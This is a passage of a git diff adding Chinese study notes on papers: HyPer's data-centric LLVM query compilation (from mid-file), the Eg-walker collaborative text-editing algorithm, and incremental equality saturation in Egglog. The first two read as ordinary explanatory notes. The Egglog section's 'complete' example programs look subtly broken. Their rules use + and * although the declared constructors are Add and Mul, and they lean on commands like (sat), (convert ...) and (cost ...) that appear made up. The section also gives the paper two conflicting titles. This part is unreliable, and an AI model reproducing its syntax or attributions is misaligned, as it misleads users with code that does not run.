寄存器 | 每次 `next()` 易 spill | 连续 push 直到 breaker | +| 代码形状 | 递归、多层调用 | **单段紧凑循环** | + +### 4. Data-Centric 编译 + +算子边界在**生成代码里被抹平**。例如 `Scan(R1) → σ(x=7) → HashBuild` 编译成**同一段**循环:扫列、比 predicate、写 hash 表——不再有三个独立 `Next()`。 + +### 5. produce / consume 接口(仅存在于编译器内) + +编译器视角下,每个算子提供两个概念方法: + +- **`produce()`**:向下游算子要输入,启动数据流; +- **`consume(attributes, source)`**:收到上游推来的 tuple,执行本算子逻辑。 + +**关键点**:这两个函数**不会出现在运行时**——编译器根据它们**展开成 imperative 代码**。运行时只有 LLVM 生成的机器码。 + +### 6. LLVM + C++ 混合执行 + +``` +┌─────────── LLVM 生成的「链条」:filter / hash / 内循环 ───────────┐ +│ ○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○──○ │ +└────┬───────────────────────────────┬─────────────────────────────┘ + │ 偶尔调用 │ 复杂算子交还控制 + ▼ ▼ + C++「齿轮」:索引结构、页分配、外排 merge、spill 到磁盘 … +``` + +- **热路径(99% tuple)**:纯 LLVM,寄存器常驻; +- **冷路径**:调预编译 C++(如 hash 表扩容、换页)——偶尔 spill 寄存器可接受,**每行都 spill 不行**。 + +LLVM 优势:JIT **毫秒级**、SSA「无限寄存器」简化代码生成、强类型抓 bug、自动受益于未来编译器/CPU 优化。 + +--- + +## 代码示例 1:Volcano vs 编译后的 Push 伪代码 + +下面用简化 SQL 说明两种执行形态的差异: + +```sql +SELECT * FROM R1, R3, + (SELECT R2.z, COUNT(*) FROM R2 WHERE R2.y = 3 GROUP BY R2.z) R2 +WHERE R1.x = 7 AND R1.a = R3.b AND R2.z = R3.c; +``` + +**Volcano 风格(Pull,每行多次虚调用):** + +```python +def top_join_next(): + while True: + t3 = scan_R3_next() # 虚调用 + if t3 is None: return None + for t2 in hash_probe_Bzc(t3.c): # 又一次算子边界 + for t1 in hash_probe_Bab(t3.b): + if t1.x == 7: # 本可在 scan 时过滤 + yield merge(t1, t2, t3) +``` + +**Data-centric 编译结果(Push,Figure 4 精神):** + +```python +# 片段 1:build Ba=b +for t in R1: + if t.x == 7: + hash_table_Bab.insert(t) + +# 片段 2:build Γz on R2 +for t in R2: + if t.y == 3: + agg_hash_Gz.add(t.z) + +# 片段 3:materialize Γz → build Bz=c +for (z, cnt) in agg_hash_Gz: + hash_table_Bzc.insert(z, cnt) + +# 片段 4:probe 并输出(内层 tight loop,列值可驻寄存器) +for t3 in R3: + for t2 in hash_table_Bzc.probe(t3.c): + for t1 in hash_table_Bab.probe(t3.b): + output(t1, t2, t3) +``` + +注意:`σ(x=7)` 与 R1 scan **融进片段 1**,不再单独成算子;片段 4 是性能关键路径。 + +--- + +## 代码示例 2:produce / consume 如何展开(Figure 5 简化) + +编译器内部的翻译规则(示意): + +```text +# HashJoin B +B.produce(): + B.left.produce() + B.right.produce() + +B.consume(attrs, source): + if source == B.left: + emit LLVM: "materialize attrs into hash table slot" + else: + emit LLVM: "for each match in hashTable[attrs.joinKey]: ..." + B.parent.consume(merged_attrs, B) + +# Selection σ +σ.produce(): + σ.input.produce() + +σ.consume(attrs, source): + emit LLVM: "if (" + σ.condition + ") { parent.consume(attrs); }" + +# TableScan +scan.produce(): + emit LLVM: "for each tuple t in relationFragment:" + emit LLVM: " parent.consume(t.columns, scan)" +``` + +对 Figure 3 的算子树应用上述规则,就得到 Figure 4 的四段 imperative 代码——**规则简单,但真实实现要跟踪属性依赖、相关子查询、多输入 join 左右差异等**(论文称 SQL-92 全套算子代码生成约 11,000 行)。 + +--- + +## 代码示例 3:分支布局对性能的影响 + +Hash 表冲突链遍历若写成「混合存在性与链表结束」的 while,分支预测约 50/50,**极慢**。论文建议拆成: + +```cpp +// 不友好:while 混合两种分支语义 +Entry* iter = hashTable[hash]; +while (iter) { + inspect(iter); + iter = iter->next; +} + +// 友好:先判断桶非空,再 do-while 短链 +Entry* iter = hashTable[hash]; +if (iter) { + do { + inspect(iter); + iter = iter->next; + } while (iter); +} +``` + +论文报告:**仅调整分支结构**即可让 hash lookup 快 **20%+**。LLVM 生成代码时同样遵守此布局原则。 + +--- + +## 与高级技术的结合 + +论文第 5 节说明框架可**自然扩展**,不必退回 Volcano: + +| 技术 | 如何融入 | +|------|----------| +| **SIMD** | 在 push 路径上把多个 tuple 打包进向量寄存器;LLVM 原生支持 vector type | +| **块处理** | 以 **fragment**(连续 tuple 块)为单位循环——与存储布局对齐 | +| **多核** | 不同 fragment 可并行;merge 结果需额外逻辑(论文留作 future work,后续 morsel-driven 等工作接续) | + +--- + +## 实验结果(HyPer,TPC-CH 基准) + +### OLTP(TPC-C,12 warehouse,单线程) + +| 后端 | 吞吐 (tps) | 总编译时间 | +|------|------------|------------| +| HyPer + C++ | 161,794 | **16.53 s** | +| HyPer + LLVM | 169,491 | **0.81 s** | + +OLTP 查询简单、touch tuple 少,运行时差距不大;**编译时间差一个数量级**决定能否用于交互式场景。 + +### OLAP(TPC-H 改编 Q1–Q5,warm run) + +| 查询 | HyPer C++ (ms) | HyPer LLVM (ms) | VectorWise | MonetDB | +|------|----------------|-----------------|------------|---------| +| Q1 | 142 | **35** | 98 | 72 | +| Q2 | 374 | **125** | — | 218 | +| Q3 | 141 | **80** | 257 | 112 | +| Q4 | 203 | **117** | 436 | 8168 | +| Q5 | 1416 | **1105** | 1107 | 12028 | + +Q1(单 scan + 聚合)最能体现寄存器常驻优势;Q5 join 重时差距缩小。 + +### 代码质量(callgrind,相对 MonetDB) + +- **分支总数**:LLVM 版通常少一个数量级(单段代码 vs BAT 多次触碰); +- **分支误判**、**L1/L2 cache miss**:LLVM 版多数查询更低; +- **动态指令数**:LLVM 生成代码更紧凑。 + +--- + +## 与后续系统的关系 + +| 系统 / 工作 | 关联 | +|-------------|------| +| **HyPer + Morsel-Driven (2014)** | 同一数据库上的 **并行调度** 层;编译出快代码,morsel 负责多核 | +| **Umbra (Neumann 后续)** | 继承 data-centric + LLVM 路线 | +| **DuckDB** | 向量化 + 可选 **query pipeline 编译**;工程上吸收了「少物化、紧循环」思想 | +| **Velox / 各云引擎** | 物理计划执行层分离;Neumann 2011 解决的是「单节点内核如何贴近 CPU」 | + +读 2011 论文时的一个心法:**优化器产出的是代数 DAG,但 CPU 想执行的是「for 循环 + 少分支 + 寄存器里算完」**——编译层的工作就是把前者变成后者。 + +--- + +## 实现与维护性 + +- SQL-92 代数算子 → LLVM 的代码生成器:**约 11,000 行**(论文结论:compact and maintainable); +- 不必手写汇编:LLVM SSA + 类型检查降低 bug 率; +- 依赖 **主流编译器栈**,硬件升级时 DBMS 不必重写算子内核。 + +--- + +## 局限与未覆盖点 + +1. **并行划分策略**论文仅点到为止(2014 morsel 论文专门补这块); +2. **磁盘 spill** 存在但与内存场景相比论述较少; +3. **编译计划缓存**:重复查询摊销编译成本,论文实验用 prepared query warm run; +4. **超宽表 / 超大 tuple**:「全部进寄存器」假设会破,需物化部分列。 + +--- + +## 零基础自检清单 + +读完后,你应该能回答: + +1. **为什么 Volcano 在内存数据库里慢?**(每行虚调用、寄存器 spill、分支预测) +2. **Pipeline breaker 在本文里是什么意思?**(被迫离开寄存器的物化点) +3. **Push 和 Pull 的本质区别?**(控制流方向 + 能否生成单段 tight loop) +4. **produce/consume 何时存在?**(仅编译期;运行时是 LLVM 机器码) +5. **为何选 LLVM 而不是 runtime 拼 C++?**(JIT 快、代码质量、可移植、类型安全) +6. **Q1 为何是最佳 showcase?**(scan + agg,几乎无 join,寄存器策略收益最大) + +--- + +## 延伸阅读 + +- Thomas Neumann, *Efficiently Compiling Efficient Query Plans for Modern Hardware*, PVLDB 4(9), 2011. [PDF](https://www.vldb.org/pvldb/vol4/p539-neumann.pdf) +- Kemper & Neumann, *HyPer: A hybrid OLTP&OLAP main memory database system*, ICDE 2011(同一系统的 OLTP/OLAP 混合架构) +- Leis et al., *Morsel-Driven Parallelism*, SIGMOD 2014(HyPer 并行执行,本仓库笔记:`morsel-driven-2014.md`) +- Boncz et al., *MonetDB/X100: Hyper-Pipelining Query Execution*, CIDR 2005(向量化对照组) + +--- + +## 一句话总结 + +**不要把 SQL 计划当作运行时的一串算子对象去「拉」——在编译期把它展开成 push 式、breaker 之间寄存器友好的机器码;LLVM 让这种展开既快又便携,从而在现代 CPU 上逼近手写 C++ 的执行效率。** diff --git a/src/content/docs/papers/eg-walker-collab-text-2024.md b/src/content/docs/papers/eg-walker-collab-text-2024.md new file mode 100644 index 000000000..2b24cd6fb --- /dev/null +++ b/src/content/docs/papers/eg-walker-collab-text-2024.md @@ -0,0 +1,296 @@ +--- +title: Eg-walker — 协同文本编辑的「按需 CRDT」:更好、更快、更小 +来源: https://arxiv.org/abs/2409.14252 +日期: 2026-06-13 +子分类: 编辑器与 IDE +分类: CLI +provenance: pipeline-v3 +--- + +## 日常类比:Git 分支合并,但不用背整本字典 + +你和同事在改同一份稿子。最土的做法是**抢锁**:谁拿到锁谁改,别人等着——像会议室里只有一支马克笔。 + +**Google Docs** 像**魔法白板**:你插一个字、对方插一个字,最后板上自动变成合理结果。背后常用 **OT(Operational Transformation,操作变换)**:收到别人的操作时,按规则「平移」插入位置。两人各改一处时很快;但若你们**各自离线写了一万字**再合并,OT 要把你的每个操作和对方的每个操作两两变换,复杂度往往 **O(n²)** 甚至更差——论文里有一个真实 trace,OT 合并要 **1 小时**,而 Eg-walker 只要 **24 ms**。 + +**Yjs / Automerge** 这类 **CRDT** 像给每个字符发**永久身份证**:并发插入不靠整数下标,靠 ID 排序,合并时不用 OT 那种两两变换。代价是:身份证和墓碑(已删字符的元数据)要**一直留在内存和磁盘里**。打开一篇长文,CRDT 可能比纯文本多占 **10 倍以上** 内存——所以 Google Docs、Overleaf 仍选 OT。 + +**Eg-walker**(Event Graph Walker,事件图漫步者)想兼得两边优点: + +- **平时**:内存里只有**纯文本**(像 OT),没有 CRDT 元数据; +- **合并并发分支时**:临时启动内部 CRDT,算完就**扔掉**(像「只借一次字典」); +- **历史**:用**事件图(DAG)** 记录谁何时做了什么,磁盘上可高度压缩。 + +作者 Joseph Gentle 与 Martin Kleppmann([[crdt-json]] 合著者之一)在 **EuroSys 2025** 发表此文,获 **Gilles Muller Best Artifact Award**;实现与 benchmark 见 [egwalker-paper](https://github.com/josephg/egwalker-paper)。 + +## 是什么 + +Eg-walker 是一种**纯文本协同编辑算法**,保证: + +1. 多副本最终看到**相同字符序列**(强 eventual consistency); +2. 并发插入在语义上满足 **maximally non-interleaving**(同位置并发插入不会乱交错成 `a1b2` 这种「拉链」); +3. 不依赖中心服务器,可用于 **P2P**(飞机舱内、野外科考、断网协作等场景)。 + +每个副本持久化三块状态中的两块: + +| 状态 | 内容 | 是否持久化 | +|------|------|------------| +| **Event graph** | 插入/删除操作的 DAG,带 parent 指针 | 是(紧凑二进制格式) | +| **Document state** | 当前可见文本(rope / piece table 等) | 是(可当纯文本文件) | +| **Internal state** | 临时 CRDT + 双版本 B 树 | **否**(合并完可丢弃) | + +这与 [[zed-editor-collaborative]] 等「CRDT 常驻内存」的路线形成鲜明对比:Zed 把 CRDT 当一等公民;Eg-walker 把 CRDT 当**合并时的临时工**。 + +## 为什么重要 + +不懂 Eg-walker,下面问题很难答清: + +1. **OT 和 CRDT 的二选一是不是永恒的?** —— 论文证明可以 hybrid:索引式操作 + 按需 CRDT。 +2. **为什么 local-first / 离线写作 + Git 式分支** 在 OT 编辑器里很难做? —— 大 divergence 下 OT 合并太慢;Eg-walker 针对 DAG 合并做到 **O(n log n)** 量级。 +3. **打开 10 万字文档为何 CRDT 编辑器卡顿?** —— 要加载全部字符 ID 与墓碑;Eg-walker 稳态内存接近纯文本。 +4. **和 Kleppmann 之前工作什么关系?** —— 同一「事件图 + 纯函数 replay」脉络,但 Eg-walker 是**首个**在文本上同时击败 OT(大分支)与 CRDT(内存/加载)主流弱点的实用算法。 + +## 架构全景 + +```mermaid +flowchart LR + subgraph 持久化 + EG[Event Graph DAG] + DOC[Document Text] + end + + subgraph 临时["仅合并时存在"] + CRDT[Internal CRDT] + BT[Order-statistic B-trees] + end + + User[用户编辑] -->|Insert i / Delete i| EG + User --> DOC + Remote[远端事件] --> EG + EG -->|拓扑排序 + walk| CRDT + CRDT --> BT + CRDT -->|变换后的 index 操作| DOC + CRDT -.->|合并完成| x[丢弃] +``` + +## 核心概念 + +### 1. 操作与事件图 + +基本操作(可压缩为连续 run): + +- `Insert(i, c)` — 在零基下标 `i` 插入字符 `c` +- `Delete(i)` — 删除下标 `i` 处的字符 + +每个操作包装成 **event**:含唯一 ID、`parents`(生成时本副本已知的 frontier 事件集)、原始 index 操作。所有 event 构成 **DAG**: + +- `a → b`:a 发生在 b 之前(因果序) +- `a ∥ b`:并发,互不前驱 + +**Frontier(版本)** = 当前图中「没有子节点」的事件集合,可看作逻辑时钟:「我此刻认定世界长什么样」。 + +Figure 1 经典例子:两人从 `Helo` 出发,一人 `Insert(3,"l")`,另一人 `Insert(4,"!")`。在 User 1 侧,后到的 `Insert(4,"!")` 必须变成 `Insert(5,"!")` 才得到一致的 `Hello!`。 + +### 2. replay 抽象 + +协同算法可统一写成纯函数: + +```text +doc = replay(event_graph) +``` + +给定已有图 `G` 与当前文档 `doc`,新事件 `e` 的增量更新是:求出一个 **index 操作** `op'`,使得 `apply(doc, op') = replay(G ∪ {e})`。OT 和 CRDT 都是求这个 `op'` 的不同实现;Eg-walker 用 **walk + 临时 CRDT** 求。 + +### 3. prepare 版本 vs effect 版本 + +内部状态同时跟踪两个「文档版本」: + +- **prepare version**:解释**当前 event 原始下标**时所处的文档快照(= event 的 parents 所定义的版本) +- **effect version**:**所有已处理 event** 生效后的文档 + +对应三个原语(论文 Section 3.2): + +- `apply(e)` — prepare 已对齐 `e.parents` 时,把 e 纳入两版本并输出变换后的操作 +- `retreat(e)` — 从 prepare 版本**撤销** e 的效果(effect 不变) +- `advance(e)` — 把已在 effect 中的 e **加回** prepare + +遍历 DAG 时,常在分支间切换:先 `retreat` 掉与下一 event 并发的操作,再 `apply` 新分支,必要时 `advance` 共同祖先。这就像 Git rebase 时在多个 branch 间切来切去,但对象是**字符级操作**而非 commit。 + +### 4. 内部 CRDT 与双状态位 + +每个字符一条 record,含: + +- 插入 event 的 ID +- `s_p`:prepare 中可见性(`NotInsertedYet` / `Ins` / `Del 1` / `Del 2` / …) +- `s_e`:effect 中可见性(`Ins` / `Del`) + +并发插入的顺序由内部 list CRDT(实现采用 Yjs/YATA 变体)决定。`retreat`/`advance` 只改 `s_p`;`apply` 更新 `s_e` 并可能输出对**当前纯文本**的 Insert/Delete。 + +为 O(log n) 找「第 i 个可见字符」,论文用 **order-statistic B-tree** 维护子树内 `s_p=Ins` / `s_e=Ins` 的计数;另有一棵 **event ID → record** 的 B-tree 支持按 ID 做 retreat/advance。 + +### 5. Critical version 与部分 replay + +**Critical version** `V`:把事件图切成 `G1 = Events(V)` 与 `G2 = G - G1`,且 `G1` 中每个事件都发生在 `G2` 每个事件之前。直观理解:**一次「全员同步点」**,之后没有与之前并发的编辑。 + +关键优化: + +- 到达 critical version 时可**清空 internal state**; +- 若 event 与其 parent 都在 critical version 上,**无需变换**,原样输出; +- 增量合并新事件时,只需从**最近 critical version 之后**的子图 replay,前面用 **placeholder** 代表「未知长度的旧文档」。 + +因此典型「轮流写、很少并发」的论文/代码 trace,绝大部分 event 走**零变换快路径**;只有并发簇附近才付 CRDT 成本。 + +### 6. 与 OT / CRDT 的复杂度对照 + +| 场景 | OT | 常驻 CRDT | Eg-walker | +|------|-----|-----------|-----------| +| 在线小编辑(n 小) | 快 | 元数据常驻 | 快(常无 internal state) | +| 两分支各 n 个离线 op 合并 | O(n²)+ | O(n) 但带大常数 | **O(n log n)** | +| 稳态内存 | ~纯文本 | 文本 + ID/墓碑 | **~纯文本** | +| 打开文档 | 快 | 慢(加载 CRDT) | **快**(主要加载文本 + 压缩事件图) | +| P2P / 无服务器 | 部分 OT 受限 | 可以 | **可以** | + +最坏情况下 Eg-walker 合并性能与最好 CRDT 相当;最好情况下比 CRDT 省 **1–2 个数量级**内存,比 OT 快**数个数量级**。 + +## 代码示例 + +### 示例 1:事件结构与并发插入(教学用 TypeScript) + +下面不是论文官方代码,但忠实于论文 Figure 1–2 的建模方式: + +```typescript +type Op = + | { kind: "insert"; index: number; char: string } + | { kind: "delete"; index: number }; + +interface Event { + id: string; + parents: string[]; // frontier at creation time + op: Op; +} + +// 两人从 "Helo" 并发编辑 +const e3: Event = { + id: "e3", + parents: ["e2"], // 已知 ...Hel + op: { kind: "insert", index: 3, char: "l" }, +}; + +const e4: Event = { + id: "e4", + parents: ["e2"], // 同样基于 ...Hel,与 e3 并发 + op: { kind: "insert", index: 4, char: "!" }, +}; + +// replay 后两边都应是 "Hello!" +// User1 侧:先应用 e3 → "Hell",收到 e4 需变换为 Insert(5,"!") +// Eg-walker 在 walk 时通过 prepare/effect 版本自动完成该变换 +``` + +要点:**event 里永远存原始 op**;变换只发生在应用到本地 `doc` 时,不篡改历史。 + +### 示例 2:prepare 版本切换(retreat / advance 骨架) + +对应论文 Figure 4(`hi` → 一路径变 `hey`,另一路径变 `Hi`,最后加 `!`)的简化控制流: + +```typescript +type Walker = { + prepare: Set; // event ids in prepare version + effect: Set; // event ids in effect version +}; + +function movePrepare(w: Walker, targetParents: Set, topo: string[]) { + const oldEvents = expandTransitive(w.prepare); + const newEvents = expandTransitive(targetParents); + + // 先 retreat:old - new,逆拓扑序 + for (const id of topo.filter((id) => oldEvents.has(id) && !newEvents.has(id)).reverse()) { + retreat(id); // 更新内部 CRDT 的 s_p + w.prepare.delete(id); + } + + // 再 advance:new - old,拓扑序 + for (const id of topo.filter((id) => newEvents.has(id) && !oldEvents.has(id))) { + advance(id); + w.prepare.add(id); + } +} + +function applyEvent(w: Walker, e: Event, topo: string[]): Op { + movePrepare(w, new Set(e.parents), topo); + const transformed = internalApply(e); // index 从 prepare 映到 effect + w.effect.add(e.id); + w.prepare.add(e.id); + return transformed; +} +``` + +真实实现还要维护 B 树计数、placeholder 分段、run-length 压缩等;但**控制流核心**就是:在应用每个 event 前,把 prepare 版本**精确对齐**到 `e.parents`。 + +### 示例 3:判断 critical version(概念代码) + +```typescript +function isCriticalVersion(events: Map, version: Set): boolean { + const g1 = expandTransitive(version); + const g2 = new Set([...events.keys()].filter((id) => !g1.has(id))); + for (const a of g1) { + for (const b of g2) { + if (!happensBefore(events, a, b)) return false; + } + } + return true; +} + +// 若 isCriticalVersion 为真,可安全: +// - 丢弃 internal CRDT +// - 后续 replay 仅从该 version 之后开始 +``` + +人类写作 trace 里 critical version 很常见(例如一次 merge 点、一次全员 sync),这是 Eg-walker **日常接近 OT 内存 footprint** 的原因。 + +## 存储与网络 + +论文 Section 3.8 描述事件图磁盘格式:利用人类编辑「连续插入/删除成 run」的特点,大量线性链可极度压缩。网络上只广播 **event**(含 parent IDs 与 op),**从不**同步 internal CRDT 状态——与 Automerge 二进制快照形成对比。 + +可靠广播 + 因果交付即可:若 event 的 parent 未到,先缓冲(标准 causal broadcast)。 + +## 评测与 artifact + +作者发布 **真实编辑 trace** 套件(论文、小说、代码等),测量: + +- 加载文档 CPU 时间 +- 合并远端副本 CPU 时间 +- 内存占用 +- 磁盘文件大小 + +对比对象包括多种文本 CRDT 与 OT 实现。结论:Eg-walker 在「大分支合并」「打开大文档」「稳态内存」上常有好几个数量级优势;极端全并发 trace 下与最快 CRDT 同量级。 + +## 局限与后续 + +- 本文聚焦**纯文本**;富文本、表格、图形需推广(作者认为框架可扩展)。 +- Internal list CRDT 的 formal non-interleaving 证明留作后续工作。 +- 与生产级 Yjs/Automerge 生态的**工程整合**仍在早期(论文偏算法 + artifact,而非完整编辑器产品)。 + +## 与相关笔记的对照 + +| 笔记 | 关系 | +|------|------| +| [[crdt-json]] | 同一作者 Kleppmann 的 CRDT 理论脉络;Eg-walker 把 CRDT **降级为合并工具** | +| [[zed-editor-collaborative]] | Zed 选择常驻 CRDT buffer;Eg-walker 代表「元数据按需」的另一极 | +| [[monaco-editor-2016]] / [[codemirror-6-architecture]] | 浏览器编辑器通常外接 Yjs;若 Eg-walker 成熟,可能改变协同层选型 | + +## 小结 + +Eg-walker 的核心洞察可以用一句话记住: + +> **历史用事件图持久化,日常只保纯文本;只有遇到并发 DAG 时,才临时请 CRDT 当翻译,翻完就下班。** + +它把 OT 的「轻量稳态」和 CRDT 的「任意 DAG 合并」缝在一起,并用 **critical version** 把常见「顺序写作」快路径做到极致。对想做 **离线优先、P2P、长分支合并** 的写作/代码工具,这篇 EuroSys 2025 论文值得精读原文 Appendix(正确性证明)并跑一遍 [官方 benchmark 仓库](https://github.com/josephg/egwalker-paper)。 + +## 延伸阅读 + +- 论文 PDF:[arXiv:2409.14252](https://arxiv.org/abs/2409.14252) +- 作者博文:[Martin Kleppmann — Eg-walker](https://martin.kleppmann.com/2025/04/02/eg-walker-collaborative-text.html) +- 实现与 trace:[josephg/egwalker-paper](https://github.com/josephg/egwalker-paper) +- OT 经典:[Google Docs 使用的 Jupiter OT](https://docs.google.com/)(Day-Richter, 2010 技术分享) +- List CRDT 背景:RGA、YATA、Yjs diff --git a/src/content/docs/papers/egglog-incremental-2026.md b/src/content/docs/papers/egglog-incremental-2026.md new file mode 100644 index 000000000..60a2950d5 --- /dev/null +++ b/src/content/docs/papers/egglog-incremental-2026.md @@ -0,0 +1,268 @@ +--- +title: Egglog: Incremental Equality Saturation +来源: https://arxiv.org/abs/2605.30717 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# Egglog: Incremental Equality Saturation + +## 一、从"猜答案"到"把所有答案放在一起" + +想象你有一道数学题: + + 简化 2 * 3 + 2 * 7 + +普通人看到这道题,第一反应是"先算乘法"——2×3=6,2×7=14,6+14=20。但编译器优化不一样:它不知道哪个方法最好,于是它把**所有可能的变换路径全部保留**,像一个学生做作业时把所有思路都写下来,最后再看哪条最简洁。 + +这就是**等价饱和(Equality Saturation)**的核心思想:不急着选一条路,而是把所有等价变换都记录下来,最后"择优录取"。 + +Egglog 就是做这件事的工具,而且它做得比前辈更快的关键秘诀叫:**增量更新(Incremental)**。 + +> 类比:想象一个学生做数学题。传统方法是"猜一个答案然后验证";等价饱和是"把所有可能的答案都列出来,选最优的";Egglog 的增量优化是"上一次列好的答案还在,这次只加新的,不再从头列起"。 + +## 二、两个老朋友的婚姻:Datalog + EqSat + +Egglog 的论文标题叫《Better Together: Unifying Datalog and Equality Saturation》。它做了一件事:**把两个原本独立的系统结婚**。 + +### 2.1 第一个新郎:EqSat(等价饱和) + +EqSat 是 egg 库里的技术。它的核心数据结构叫 **E-graph**(等价图),像一个"等价类集合": + +- 传统数据结构和树不一样:一棵树只表示一个表达式 +- E-graph 把"相等的子表达式"合并到同一个节点里 +- 当新规则发现 A=B 时,把 A 和 B 对应的节点合并 + +### 2.2 第二个新郎:Datalog + +Datalog 是数据库领域的逻辑编程语言。它的核心能力: + +- **增量计算**:数据变了,只重新计算受影响的规则,不从头跑 +- **固定点(Fixpoint)**:规则反复执行直到没有新事实产生 +- **关系推理**:擅长多步推理,比如"A 是 B 的父亲,B 是 C 的父亲 → A 是 C 的祖父" + +### 2.3 婚姻的好处 + +| 能力 | EqSat 有 | Datalog 有 | Egglog 有 | +|------|----------|------------|-----------| +| 项重写 + 等价类合并 | 有 | 没有 | 有 | +| 增量计算 + 固定点 | 没有 | 有 | 有 | +| 代价最优提取 | 有 | 没有 | 有 | + +Egglog 把两者结合后:既能做复杂的项重写,又能增量更新,还能自动找最优结果。 + +## 三、核心概念拆解 + +### 3.1 E-graph(等价图) + +E-graph 是 Egglog 的心脏。用最简单的类比: + +> 普通的数据结构是一棵树,每个节点只有一个父节点。E-graph 是一张图,多个"看起来不同但相等"的表达式可以共享节点。 + +``` +表达式: 2 * 3 + 2 * 7 + 可以提取出多种等价形式: + 20, 2*(3+7), 2*10, ... +``` + +E-graph 把所有这些形式都保留,不会丢失任何可能性。 + +### 3.2 等价规则(Eqrules) + +规则告诉 Egglog "什么等于什么": + +``` +; 分配律: a*(b+c) = a*b + a*c +(egraph (let ((a Expr) (b Expr) (c Expr)) + (= (* a (+ b c)) + (+ (* a b) (* a c))))) +``` + +每次加入一条规则,E-graph 就自动执行 congruence closure(等价闭包),把新发现的等价关系合并到图中。 + +### 3.3 增量执行 + +这是 Egglog 最厉害的地方。传统方法每加一条规则,就从零开始跑所有规则。Egglog 只重新计算**受规则影响的那部分**: + +> 类比:你有一个账本,记录了所有账目关系。如果新增了一笔交易,传统方式是把所有账目重新算一遍;Egglog 只重新算受这笔交易影响的那些账。 + +### 3.4 代价模型与提取(Cost Model & Extraction) + +E-graph 里可能有成百上千个等价表达式,Egglog 需要你告诉它"哪个更好": + +``` +; 定义表达式"代价":数字越小越优 +(cost (+ 1) (* 2)) +``` + +最后从所有等价表达式中选一个代价最低的作为最终结果。 + +## 四、代码示例 + +### 示例 1:基本的算术简化 + +下面是一个完整的 Egglog 程序,演示了如何简化算术表达式: + +```egglog +; ============================================ +; 定义数据类型:表达式 +; ============================================ +(datatype Expr + Num(Int) + Add(Expr Expr) + Mul(Expr Expr)) + +; ============================================ +; 重写规则:加法交换律、结合律、分配律 +; ============================================ + +; 加法交换律: a + b = b + a +(rule (= (+ ?a ?b) (+ ?b ?a))) + +; 加法结合律: (a + b) + c = a + (b + c) +(rule (= (+ (+ ?a ?b) ?c) (+ ?a (+ ?b ?c)))) + +; 乘法交换律: a * b = b * a +(rule (= (* ?a ?b) (* ?b ?a))) + +; 乘法分配律: a * (b + c) = a*b + a*c +(rule (= (* ?a (+ ?b ?c)) + (+ (* ?a ?b) (* ?a ?c)))) + +; 乘以 0 等于 0 +(rule (= (* ?a 0) (Num 0))) + +; 乘以 1 不变 +(rule (= (* ?a 1) ?a)) + +; 0 加 x 不变 +(rule (= (+ ?a 0) ?a)) + +; ============================================ +; 代价模型:给操作打分 +; ============================================ +(cost (Num _) 1) +(cost (Add _ _) 2) +(cost (Mul _ _) 3) + +; ============================================ +; 运行饱和:反复应用规则直到没有新变化 +; ============================================ +(let ((x (+ (* 2 3) (* 2 7)))) + (convert Expr x) + (sat)) + +; 提取最优结果:应该是 (Num 20) +(let ((best (extract Expr x))) + (print best)) +``` + +这个程序做了三件事: + +1. **定义数据类型**:Expr 可以是数字、加法或乘法 +2. **声明重写规则**:交换律、结合律、分配律等 +3. **运行饱和**:自动找出 2×3+2×7 的最简形式 + +### 示例 2:使用 Datalog 风格的 fact 和规则 + +Egglog 的 Datalog 能力让你可以维护"额外信息": + +```egglog +; ============================================ +; 声明一个关系表:记录每个表达式的"类型" +; ============================================ +(datatype Expr + Num(Int) + Add(Expr Expr) + Mul(Expr Expr)) + +; 关系表:标记哪些表达式"肯定是数字" +(pred is-num Expr) + +; 规则:如果一个表达式是 Num 构造的,它肯定是数字 +(rule (is-num (Num ?n))) + +; 规则:如果 a 和 b 相等,且 a 是数字,那么 b 也是数字 +(rule (=> (is-num ?a) (= ?a ?b) (is-num ?b))) + +; ============================================ +; 添加一些事实(已知信息) +; ============================================ +(is-num (Num 42)) + +; 添加等价规则 +(rule (= (+ ?a ?b) (+ ?b ?a))) + +; 添加事实:这个表达式等于 Num 42 +(let ((x (+ (Num 42) 0))) + (convert Expr x) + (sat)) + +; 现在查询:x 是不是数字? +; Egglog 通过增量计算会自动推导: is-num(x) 为真 +``` + +这个例子展示了 Egglog 的 Datalog 能力——你可以像写 SQL 一样维护关系数据,同时做等价类推理。 + +## 五、增量更新的魔力 + +Egglog 的增量更新比传统方法快多少?从论文数据来看: + +- **指针分析**:Egglog 实现比纯 Datalog 方案快,也比纯 EqSat 方案快 +- **浮点表达式重写**:同样在 Egglog 中统一实现,比两个独立系统更快更简单 + +为什么?因为增量更新意味着: + +1. 当 E-graph 变大时,不是 O(n²) 的重新计算,而是只更新受影响的子图 +2. 当添加新规则时,不破坏已有的等价类,只扩展 +3. 多个分析可以协作运行(Datalog 的 cooperates analyses),一个分析的结果直接驱动另一个 + +> 类比:想象你在整理书架。传统方法每次加一本书就把整个书架清空重排。Egglog 的增量更新就像"只移动和新书相关的书",其他不动。 + +## 六、Egglog 的典型应用场景 + +1. **编译器优化**:自动发现最优的代码变换序列(如 LLVM 的优化 pass 可以声明式地写成 Egglog 规则) +2. **程序验证**:证明两个程序等价 +3. **模板引擎**:像 SQL 优化器一样,从大量等价 SQL 中选出最优执行计划 +4. **数学定理证明**:把定理证明转化为等价搜索问题 +5. **代码综合**:从一组规则自动生成满足条件的代码 + +## 七、Egglog 语言的语法速查 + +Egglog 的代码由三种基本单元组成: + +| 单元 | 作用 | 类比 | +|------|------|------| +| **datatype** | 定义数据类型 | struct/class | +| **rule** | 声明重写规则或逻辑推理 | if-then 规则 | +| **fact** | 添加已知事实 | 数据记录 | + +核心命令: + +- `(sat)` — 执行等价饱和(反复应用规则直到不动点) +- `(convert Type expr)` — 把一个表达式转换为指定类型 +- `(extract Type expr)` — 从等价图中提取最优表达式 +- `(cost op n)` — 定义操作代价 +- `(union id1 id2)` — 手动合并两个等价类 + +## 八、总结 + +Egglog 的核心创新可以用一句话概括: + +> 把 Datalog 的增量计算能力和 EqSat 的等价类搜索能力统一在一个系统中。 + +从日常角度来看: + +1. **E-graph** = 把所有可能的等价答案都记下来(不急着选) +2. **规则** = 告诉系统"什么等于什么" +3. **增量更新** = 上一次的结果还在,这次只算新东西 +4. **代价模型** = 告诉系统"哪个答案更好" +5. **提取** = 从所有答案中选最优的 + +Egglog 